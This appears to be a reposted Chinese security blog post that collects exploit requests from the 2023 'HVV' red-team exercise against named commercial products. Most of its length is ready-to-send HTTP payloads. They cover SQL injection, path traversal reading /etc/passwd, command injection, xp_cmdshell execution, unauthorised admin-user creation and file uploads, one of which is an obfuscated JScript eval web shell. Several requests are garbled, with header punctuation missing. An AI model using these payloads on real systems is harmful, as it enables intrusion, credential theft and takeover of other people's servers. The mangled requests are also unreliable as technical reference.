【情报速递】2023hvv漏洞搜集(附EXP)
2023-8-16 20:8:12 Author: EchoSec(查看原文) 阅读量:79 收藏

免责声明

技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!

HW2023POC收集:

天玥前台注入:

POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host: ****
Connectionclose
Cache-Controlmax-age=0
sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-AgentMozilla/5.0 (MacintoshIntel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTMLlike GeckoChrome/88.0.4324.96 Safari/537.36
Accepttext/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Sitenone
Sec-Fetch-Modenavigate
Sec-Fetch-User: ?1
Sec-Fetch-Destdocument
Accept-Languagezh-CN,zh;q=0.9
Cookie: ****
Content-Typeapplication/x-www-form-urlencoded
Content-Length: 39

checkname=123&tagid=123

绿盟sas安全审计系统任意文件读取:


/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd

sx服:

POST /rep/login
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123

漏洞情报POC# sxf-报表 版本有限制:

POST /rep/login HTTP/1.1 
Host
Cookie
User-AgentMozilla/5.0 (MacintoshIntel Mac 0s X 10.15ry:109.0)Gecko/20100101 Firefox/115.0 Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avifimage/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2 
Accept-Encoding: gzip deflate 
Upgrade-Insecure-Requests: 1 
Sec-Fetch-Dest: document 
Sec-Fetch-Mode: navigate 
Sec-Fetch-Site: cross-site 
Pragma: no-cache 
Cache-Control: no-cache14 
Te: trailers 
Connection: close 
Content-Type:application/x-www-form-urlencoded 
Content-Length: 126
clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq

fanwei Weaver E-Office9 前台文件包含:

http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls

ruijie NBR 路由器 fileupload.php 任意文件上传漏洞:

http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xlsPOST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
Host
Accepttext/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg
POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
Host: 
Accept: text/plain, */
*; q=0.01
Content-Dispositionform-dataname="file"; filename="111.php"
Content-Typeimage/jpeg

网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞:

POST /changepass.php?type=2 

Cookieadmin_id=1; gw_user_ticket=fffffffffffffffffffffffffffffffflast_step_param={"this_name":"test","subAuthId":"1"}
old_pass=&password=Test123[email protected]&[email protected]

网神 SecGate 3600 防火墙 obj_app_upfile上传漏洞:

访问路径:attachements/xxx.php

POST /?g=obj_app_upfile HTTP/1.1
Hostx.x.x.x
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="vulntest.php"
Content-Type: text/plain

------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--

绿盟 SAS堡垒机 GetFile 任意文件读取漏洞:

通过漏洞包含 www/local_user.php 实现任意⽤户登录

/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd

绿盟 SAS堡垒机 Exec 远程命令执行漏洞:

/webconf/Exec/index?cmd=whoami

绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞:

/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin

yongyou 移动管理系统 uploadApk.do 任意文件上传漏洞:

访问路径:/maupload/apk/a.jsp

POST /maportal/appmanager/uploadApk.do?pk_objHTTP/1.1
Host
Content-Typemultipart/form-databoundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-AgentMozilla/5.0 (MacintoshIntel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTMLlike GeckoChrome/114.0.0.0 Safari/537.36
Accepttext/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection: close

------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword

hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--

广联达oa 漏洞:

sql注入漏洞


POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Hostxxx.com
Upgrade-Insecure-Requests: 1
User-AgentMozilla/5.0 (MacintoshIntel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTMLlike GeckoChrome/115.0.0.0 Safari/537.36
Accepttext/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--

文件上传漏洞

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-WithExt.basex
Accepttext/htmlapplication/xhtml+xmlimage/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: */
*
Originhttp://10.10.10.1
Refererhttp://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie
Connectionclose
Content-Length: 421

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Dispositionform-datafilename="1.aspx";filename="1.jpg"
Content-Typeapplication/text

<%@ Page Language="Jscript" Debug=true%>
<%
var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
var GFMA=Request.Form("qmq1");
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMAONOQ);
%>

------WebKitFormBoundaryFfJZ4PlAZBixjELj--

ah 明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞:

POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host
CookieLANG=zhDBAPPUSM=ee4bbf6c85e541bb980ad4e0fbee2f57bb15bafe20a7028af9a0b8901cf80fd3
Content-Length: 1117
Cache-Controlmax-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-AgentMozilla/5.0 (Windows NT 10.0Win64x64AppleWebKit/537.36 (KHTMLlike GeckoChrome/100.0.4896.127 Safari/537.36
Content-Typeapplication/x-www-form-urlencoded
Accepttext/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

  
<methodCall>
<methodName>web.user_addmethodName>
<params>
<param>
<value>
<array>
<data>
<value>
<string>adminstring>
value>
<value>
<string>5string>
value>
<value>
<string>10.0.0.1string>
value>
data>
array>
value>
param>
<param>
<value>
<struct>
<member>
<name>unamename>
<value>
<string>teststring>
value>
member>
<member>
<name>namename>
<value>
<string>teststring>
value>
member>
<member>
<name>pwdname>
<value>
<string>[email protected]>
value>
member>
<member>
<name>authmodename>
<value>
<string>1string>
value>
member>
<member>
<name>deptidname>
<value>
<string>string>
value>
member>
<member>
<name>emailname>
<value>
<string>string>
value>
member>
<member>
<name>mobilename>
<value>
<string>string>
value>
member>
<member>
<name>commentname>
<value>
<string>string>
value>
member>
<member>
<name>roleidname>
<value>
<string>102string>
value>
member>
struct>
value
>
param>
params>
methodCall>

金和OA GetSgIData.aspx SQL注入漏洞:

POST /c6/Contro/GetSglData.aspx/.ashx
Hostip.port
User-AgentMozillal5.0 (Windows NT 5.1AppleWebkit/537.36(KHTML, like GeckoChrome/35.0.2117.157 Safari/537 36
Connectionclose
Content-Length.189
Content-Typetext/plain
Accept-Encodinggzip
exec master..xp cmdshell 'ipconfig'

Coremail 邮件系统未授权访问获取管理员账密POC:

/coremail/common/assets/;l;/;/;/;/;/s?biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626e68&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2

sxf报表 任意读取:

GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
Hostxx.xx.xx.xx:85
User-AgentMozilla/4.0 (compatibleMSIE 8.0Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

大华智慧园区综合管理平台 searchJson SQL注入漏洞:

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-AgentMozilla/5.0 (MacintoshIntel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTMLlike GeckoVersion/12.0.3 Safari/605.1.15
Accept-Encodinggzipdeflate

大华智慧园区综合管理平台 文件上传漏洞:

POST /publishing/publishing/material/file/video HTTP/1.1
Host: 127.0.0.1:7443
User-AgentMozilla/5.0 (MacintoshIntel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTMLlike GeckoVersion/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Typemultipart/form-databoundary=dd8f988919484abab3816881c55272a7
Accept-Encodinggzipdeflate
Connectionclose
--dd8f988919484abab3816881c55272a7
Content-Dispositionform-dataname="Filedata"; filename="0EaE10E7dF5F10C2.jsp"
<%@page contentType="text/htmlcharset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Dispositionform-dataname="poc"
poc
--dd8f988919484abab3816881c55272a7
Content-Dispositionform-dataname="Submit"

yongyou时空KSOA PayBill SQL注入漏洞:

POST /servlet/PayBill?caculate&_rndHTTP/1.1
Host: 1.1.1.1
User-AgentMozilla/5.0 (MacintoshIntel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTMLlike GeckoVersion/12.0.3 Safari/605.1.15
Content-Length: 134
Accept-Encodinggzipdeflate
Connectionclose
<?xml version="1.0encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>

HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞:

/serverLog/showFile.php?fileName=../web/html/main.php

泛微E-Office uploadify.php后台文件上传漏洞:

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host
User-AgentMozilla/5.0 (MacintoshIntel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTMLlike GeckoChrome/49.0.2656.18 Safari/537.36
Connectionclose
Content-Length: 259
Content-Typemultipart/form-databoundary=e64bdf16c554bbc109cecef6451c26a4
Accept-Encodinggzip

--e64bdf16c554bbc109cecef6451c26a4
Content-Dispositionform-dataname="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php"
Content-Typeimage/jpeg

<?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?>

--e64bdf16c554bbc109cecef6451c26a4--

路径

/attachment/3466744850/xxx.php

本文章仅供学习使用,请勿用于非法行为

文章来源:释然IT杂谈

 往期回顾

1111
  1.  | CVE-2023-33246 RCE漏洞(附EXP)

  2.  | 横向移动与域控权限维持方法总汇

  3.  | Apache HTTPd最新RCE漏洞复现

  4.  | CNVD-2023-34111 RCE漏洞(附EXP)

  5.  | Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

  6.  | MySQL数据库利用姿势

  7.  | phpMyAdmin漏洞利用汇总

  8.  | 泛微E-Mobile任意文件上传漏洞(附EXP)

  9.  | 小技巧~用一条命令来隐藏反向Shell

  10.  New免杀ShellCode加载器(附下载)

  11.  | 红队攻防 | 解决HW被疯狂封IP姿势~(附下载)

  1. 关注我

    获得更多精彩

  2. 觉得内容不错,就点下在看
    如侵权请私聊公众号删文


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247487989&idx=1&sn=5127936e73c7c643a6eeaa679036ee68&chksm=fcdf4deacba8c4fcf4b37cf2f14fc4dacd8c1ab2efe980075d5cc78d9c3b3ea1d429c3d7cf72&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh